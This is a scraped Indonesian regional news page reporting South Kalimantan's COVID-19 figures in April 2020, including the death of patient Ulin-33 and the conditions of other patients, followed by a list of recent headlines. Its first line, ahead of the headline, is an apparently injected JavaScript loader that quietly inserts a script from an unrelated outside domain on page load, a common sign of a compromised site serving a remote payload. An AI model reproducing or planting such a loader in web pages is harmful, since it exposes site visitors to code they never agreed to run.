(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Pasien Ulin-33 Meninggal Dunia, 3 Kasus Kematian Positif Covid-19 di Kalsel


KANALKALIMANTAN.COM, BANJARBARU – Tim Gugus Tugas Pencegahan Pengendalian Penanganan (P3) Covid-19 Kalimantan Selatan menyebut ada tambahan kasus terkonfirmasi positif Covid-19 di Kalsel menjadi 19 kasus.

Ada satu kasus kematian baru akibat Covid-19 di Kalsel, sehingga tercatat ada 3 kasus kematian positif Covid-19. Pasien Ulin-33 yang meninggal pada Minggu (5/4/2020) siang kemarin, dinyatakan positif Covid-19.

Hal ini diungkapkan Juru Bicara Tim Gugus Tugas P3 Covid-19 Kalimantan Selatan Muhammad Muslim di Banjarbaru, Selasa (7/4/2020) sore.

“Ada 19 kasus terkonfirmasi positif Covid-19, ditambah yang meninggal dunia akibat Covid-19 tercatat 3 kasus. Ini termasuk kasus yang meninggal yaitu pasien Ulin-33, usia 66 tahun, seorang laki-laki dari Banjarmasin yang meninggal pada 5 April 2020,” kata Muslim.

Sekadar mengingatkan, pasien Ulin-33 merupakan kasus ketiga yang meninggal dunia akibat Covid-19 di Kalimantan Selatan, setelah pasien Ulin-23 dan Ulin-26 yang meninggal dunia sebelumnya. Pasien Ulin-33 ini merupakan dari Cluster Gowa, karena memiliki riwayat perjalanan ke Gowa, Sulawesi Selatan.

Sementara itu, Muslim juga membeberkan kondisi terbaru pasien terkonfirmasi positif Covid-19 yang dirawat di beberapa rumah sakit (RS) rujukan. Pertama, pasien Ulin-1, seorang laki-laki berusia 45 tahun rujukan Banjarmasin, Ulin-9 seorang wanita berusia 50 tahun rujukan dari Martapura, Kabupaten Banjar, Ulin-10 seorang laki-laki berusia 45 tahun yang juga rujukan dari Martapura, Kabupaten Banjar, Ulin-11 , laki-laki berusia 56 tahun rujukan Banjarmasin, dan Ulin-13 berjenis kelamin laki-laki berusia 21 tahun rujukan dari Kabupaten Tabalong kondisinya dilaporkan stabil.

“Sedangkan pasien Ulin-15 yang merupakan laki-laki berusia 41 tahun rujukan dari Kabupaten Banjar, masih mengalami sesak nafas. Pasien Ulin-24 rujukan dari Banjarbaru, Ulin-25 seorang laki-laki berusia 74 tahun dari Kabupaten Tabalong, Ulin-35, Ulin-36, Ulin-37, Ulin-38 dan Ulin-39 yang merupakan pasien baru, saat ini kondisinya dilaporkan stabil,” kata Muslim.

Data Covid-19 Kalsel Selasa 7 April 2020 pukul 16.00 Wita.

Adapun kasus terkonfirmasi positif Covid-19 terbaru yaitu pasien dengan kode Ulin-30, yang sebelumnya merupakan pasien dalam pengawasan (PDP). Muslim mengungkapkan, kondisinya masih mengalami sesak nafas.

“Begitu juga dengan pasien Ulin-29 berusia 78 tahun, seorang laki-laki dari Banjarmasin. Kondisinya masih perlu perawatan,” kata Muslim.

Sedangkan pasien terkonfirmasi positif yang dirawat di RSUD Moch. Ansari Saleh Banjarmasin dengan kode pasien MAS-1, kondisinya juga dilaporkan stabil. “(Kasus baru yang) kedua dan ketiga dengan yang saat ini menjadi positif Covid-19, terkait dengan tambahan positif, namun saat ini dilakukan isolasi mandiri dan kondisinya semuanya stabil,” beber Muslim.

Sehingga, tercatat ada tiga kasus terkonfirmasi positif Covid-19 yang menjalani isolasi mandiri dan mendapat pemantauan ketat oleh petugas medis. (kanalkalimantan.com/fikri)

Reporter : fikri
Editor : bie

 


Al Ghifari

Recent Posts

8 Nama Masuk Penjaringan DPC PKB Banjarbaru, Ada Ayah dan Anak dari Golkar

KANALKALIMANTAN.COM, BANJARBARU – Partai Kebangkitan Bangsa (PKB) pemilik 3 kursi di DPRD Kota Banjarbaru 2024-2029… Read More

1 menit ago

Jembatan Simpang 3 Lingkar Utara Banjarbaru Ditutup Sampai Akhir Tahun, Begini Pengalihan Lalin ke Bandara Syamsudin Noor

KANALKALIMANTAN.COM, BANJARBARU - Pengendara yang biasa melewati akses jembatan simpang tiga jalan Lingkar Utara, Kota… Read More

4 jam ago

Pilgub Kalsel 2024 Dipastikan Tanpa Pasangan Non Partai

Pendaftar Jalur Independen Pilkada di Kalsel Hanya 4 Daerah Read More

5 jam ago

Upah Dipotong untuk Tapera, Cuit Soleh Solihun Bikin Pekerja Ketar-ketir

KANALKALIMANTAN.COM, JAKARTA - Publik di platform sosial media tengah ramai membahas perihal pemotongan upah pekerja… Read More

5 jam ago

Kenaikan UKT Ditunda Mahasiswa Jangan Senang Dulu, Menunda Belum Membatalkan!

KANALKALIMANTAN.COM, JAKARTA - Politikus PDI Perjuangan Adian Napitupulu menyebut mahasiswa telah berhasil membuat semua orang… Read More

6 jam ago

Ikuti Bimtek ke Jakarta, Duta dan Kader Digital Audiensi ke Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Suasana akrab terlihat di Mahligai Sultan Adam, Martapura ketika Duta dan Kader… Read More

7 jam ago

This website uses cookies.